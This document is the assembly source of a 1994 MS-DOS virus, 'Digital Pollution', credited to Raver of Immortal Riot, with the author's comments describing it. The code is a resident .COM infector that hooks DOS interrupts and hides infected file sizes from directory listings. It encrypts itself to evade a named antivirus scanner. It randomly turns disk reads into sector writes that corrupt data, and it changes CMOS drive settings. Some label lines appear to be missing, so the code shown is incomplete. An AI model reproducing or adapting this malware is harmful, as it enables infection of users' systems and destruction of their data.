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; VirusName : Digital Pollution
; Origin : Sweden
; Author : Raver
; Group : Immortal Riot
; Date : 25/07/94
; It's been a while since I released my last virus but here's a new one
; anyway.
; It's a pretty simple resident non-overwriting .com-infector with
; basic stealth function. Of course it restores time/date/attrib
; and stuff like that. It hooks int 21h and infects on execute
; and open (4b00h/3dh). If a "dir" command is executed it will hide
; the new filesize of infected size by hooking 11h/12h (Find first/next
; the FCB way). The comments is, I think, pretty OK and easy to follow.
; As we have started to make out viruses a bit more destructive I've
; included some nuking routines. The virus hooks int 25h (read sector)
; at install and every time it's called there is a 3 % chance that it
; will execute a int 26h instead (write sector). It also includes a
; routine to change the CMOS values for the HD/floppy. Every time an
; infected file is executed it's 2 % chance that this will be activated
; and if so the HD will be set to 20MB and the floppy to 360kb.
; Though this can easily be restored it can cause the novice to do
; some unpredictable things before he really detects the real error.
; (like formating floppys or HD or call his hardware vendor :)
; Also if it's the swedish national day (06/06) it will play some of
; the swedish national antheme. It's completely undestructive but
; what the phuck, it could be fun.
; At last some credits to Macaroni Ted 'cause I've borrowed the
; play_song routine from his CyberCide Virus.
cseg segment byte public 'code'
assume cs:cseg, ds:cseg
org 100h
vir_size equ end_of_virus-start_of_virus
jmp entry_point
; Install code
mov ax,7777h ;check if we're already in mem
int 21h
cmp ax,'iR' ;if so - jmp already_resident
je already_resident
mov ah,2ah ;get data
int 21h
cmp dx,0606h ;if it's Sweden's national day
jne dont_play ;play the national antheme
call play_song
mov ah,4ah ;get #of available paragraphs in bx
mov bx,0ffffh
int 21h
sub bx,(vir_size+15)/16+1 ;recalculate and
mov ah,4ah
int 21h
mov ah,48h ;allocate enough mem for virus
mov bx,(vir_size+15)/16
int 21h
jc already_resident ;exit if error
dec ax ;ax-1 = MCB
mov es,ax
mov word ptr es:[1],8 ;Mark DOS as owner
push ax ;save for later use
mov ax,3521h ;get interrupt vectors for 21, 25 & 26h
int 21h
mov word ptr ds:[OldInt21h],bx
mov word ptr ds:[OldInt21h+2],es
mov al,25h
int 21h
mov word ptr ds:[old_int25h],bx
mov word ptr ds:[old_int25h+2],es
inc al
int 26h
mov word ptr ds:[int26h],bx
mov word ptr ds:[int26h+2],es
pop ax ;ax = MCB for allocated mem
push cs
pop ds
cld ;cld for movsw
sub ax,0fh ;es:[100h] = start of allocated mem
mov es,ax
mov di,100h
lea si,[bp+offset start_of_virus]
mov cx,(vir_size+1)/2 ;copy entire virii to mem
rep movsw ;this way keeps the original offsets
;in the int handler
push es
pop ds
mov dx,offset new_int21h ;hook int21h to new_int21h
mov ax,2521h
int 21h
mov di,100h ;restore the 3 first bytes to it's
push cs ;original position
push cs
pop es
pop ds
lea si,[bp+orgbuf]
mov cx,3
rep movsb
mov ah,2ch ;get time
int 21h
cmp dl,1 ;about 2% chance of a CMOS nuke
ja exit
call screw_cmos
mov ax,100h ;return control to original program
jmp ax ;at cs:100h
orgbuf db 0cdh,20h,90h ;buffer to save the 3 first bytes
newbuf db 0e9h,00h,00h ;buffer to calculate a new entry
; new interrupt 21h handler
cmp ax,7777h ;is it residency check??
jne continue
mov ax,'iR' ;if so return 'iR'
cmp ax,4b00h ;check for exec
je infect
cmp ah,3dh ;check for open
jne check_dir
jmp check_com ;if si check if .com file
cmp ah,11h ;is it a dir call??
je hide_dir ;then do some FCB stealth
cmp ah,12h
je hide_dir
jmp do_oldint21h
hide_dir: ;FCB stealth routine
pushf ;simulate a int call with pushf
push cs ;and cs, ip on the stack
call do_oldint21h
or al,al ;was the dir call successfull??
jnz skip_dir ;if not skip it
push ax bx es ;preserve registers in use
mov ah,62h ;same as 51h - Get current PSP to es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;is the PSP OK??
jnz bad_psp ;if not quit
mov bx,dx
mov al,[bx] ;al holds current drive - FFh means
push ax ;extended FCB
mov ah,2fh ;get DTA-area
int 21h
pop ax
inc al ;is it an extended FCB
jnz no_ext
add bx,7 ;if so add 7
mov al,byte ptr es:[bx+17h] ;get seconds field
and al,1fh
xor al,1dh ;is the file infected??
jnz no_stealth ;if not - don't hide size
cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds
jbe no_stealth ;as an infected is smaller -
sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size
sbb word ptr es:[bx+1fh],0 ;else sub vir_size-2 from
no_stealth: ;dir entry
pop es bx ax ;restore regs
infect: ;.com file infection routine
push es bp ax bx cx si di ds dx ;preserve registers in use
mov ax,4300h ;get attrib
int 21h
push cx ;save attrib
mov ax,4301h ;clear attrib
xor cx,cx
int 21h
mov ax,3d02h ;open file
pushf ;we can't have a standard int 21h
push cs ;call here as we would get caught
call do_oldint21h ;in a infinite loop at open calls
xchg ax,bx ;bx = file handle
push cs
pop ds
mov ax,5700h ;get time/date
int 21h
push dx ;push date/time for later use
push cx
and cl,1fh ;check if infected (if seconds is 29)
xor cl,1dh
je skip_infect
mov ah,3fh ;read three bytes
mov cx,3
mov dx,offset ds:orgbuf
int 21h
cmp word ptr ds:orgbuf,'ZM' ;check if .EXE file
je skip_infect
cmp word ptr ds:orgbuf,'MZ'
je skip_infect ;if so - don't infect
mov ax,4202h ;go eof
xor cx,cx
int 21h
add ax,offset entry_point-106h ;calculate entry offset to jmp
mov word ptr ds:newbuf[1],ax ;move it to newbuf
mov ah,2ch ;get random number and put enc_val
int 21h
mov word ptr ds:enc_val,dx
mov ax,08d00h ;copy entire virus to 8d00h:100h
mov es,ax
mov di,100h
mov si,di
mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp ;and encrypt it there
call encrypt_decrypt
mov ah,40h ;write virus to file from position
mov cx,end_of_virus-install ;08d00h:100h
mov dx,offset install
int 21h
push cs
pop ds
mov ax,4200h ;go sof
xor cx,cx
int 21h
mov ah,40h ;write 3 start bytes
mov cx,3
mov dx,offset newbuf
int 21h
mov ax,5701h ;restore time/date and mark it infected
pop cx
pop dx
or cl,00011101b
and cl,11111101b
int 21h
mov ah,3eh ;close the file
int 21h
pop cx ;get old attrib in cx
pop dx
pop ds
mov ax,4301h ;and put it right
int 21h
pop di si cx bx ax bp es ;restore registers
db 0eah ;jmp to original int21h handler
OldInt21h dd 0
check_com: ;routine to check if a file has the
push di es cx ax ;extension .com
push ds
pop es
mov cx,64
mov di,dx
mov al,'.'
repne scasb ;search for the '.' location
pop ax cx es
cmp word ptr ds:[di],'OC' ;check the 3 following bytes for COM
jne break
cmp byte ptr ds:[di+2],'M'
jne break
pop di
jmp infect ;if the match - infect the file
pop di
jmp short do_oldint21h
; new interrupt 25h handler
push dx
cmp al,2 ;check for c: and above
jb do_int25h
push cx ax
mov ah,2ch ;get random number
int 21h
pop ax cx
cmp dl,2 ;3% chance of a int 26 nuke
ja do_int25h
pop dx
db 0eah ;trash cx # of sectors by jumping
int26h dd 0 ;to int26h handler
pop dx
db 0eah ;lucky victim - a standard int25h call
old_int25h dd 0
; CMOS nuking routine
; This routine changes the floppy alternative in CMOS to a 360kb floppy
; or the hd to a 20 MB
or dl,dl ;if dl = 0 nuke CMOS floppy
jne floppy
mov cl,19h ;else nuke CMOS hd
jmp short get_crc
mov cl,10h
get_crc: ;get CMOS crc checksum
mov ax,2eh ;get most significant byte
out 70h,al ;and store in dh
in al,71h
xchg dh,al
mov al,2fh ;get least significant byte
out 70h,al ;and store in dl
in al,71h
xchg dl,al ;dx holds crc checksum
mov al,cl ;cl = function (10h=floopy, 19h=hd)
out 70h,al
in al,71h ;get current value in al
sub dx,ax ;and subtract from checksum
add dx,10h ;add new value to checksum
mov al,cl
out 70h,al
mov al,10h
out 71h,al ;put new value in CMOS
mov al,2eh ;put back new crc checksum
out 70h,al
xchg dh,al
out 71h,al ;least signigicant byte
mov al,2fh
out 70h,al
xchg dl,al
out 71h,al ;most significant byte
ret ;done!
; Swedish national anthem routine
lea si,[bp+tune]
next_note: ;loop through the tune at ds:si
lodsw ;until ds:si = 0
or ax,ax
je eot
mov di,ax
mov al,0b6h
out 43h,al
mov dx,12h
mov ax,3280h
div di
out 42h,al
mov al,ah
out 42h,al
in al,61h
mov ah,al
or al,3
out 61h,al
mov cx,ax
push cx
mov cx,2700
loop $
pop cx
loop delay
out 61h,al
jmp next_note
xor al,al ;kill the sound
out 61h,al
tune dw 370,600 ;data for the tune
dw 370,1200
dw 294,600
dw 294,600
dw 294,1200
dw 330,600
dw 370,600
dw 370,1200
dw 330,600
dw 294,600
dw 277,1800
dw 330,600
dw 330,1200
dw 277,600
dw 294,600
dw 330,600
dw 277,600
dw 370,600
dw 294,600
dw 247,2400
dw 220,1200
dw 0
dbnote db "Digital Pollution (c) '94 Raver/Immortal Riot" ;creators note
; En/de-cryption routine and entry point - unencrypted code
mov ax,word ptr ds:[bp+enc_val] ;put encryption value in ax
lea di,[bp+install] ;di points to start of crypt
mov cx,(encrypt_decrypt-install)/2 ;cx = # of words to be enc.
xor word ptr ds:[di],ax ;a simple xor loop to fullfill
inc di ;the task
inc di
loop xor_loopy
enc_val dw 0
mov sp,102h ;some alternative way to pop
call get_bp ;we don't want TBAV to flag
get_bp: ;a flexible entry point
mov bp,word ptr ds:[100h]
mov sp,0fffeh
sub bp,offset get_bp
call encrypt_decrypt ;decrypt the virus
jmp install ;jmp to install code
; end of virus
cseg ends
end start_of_virus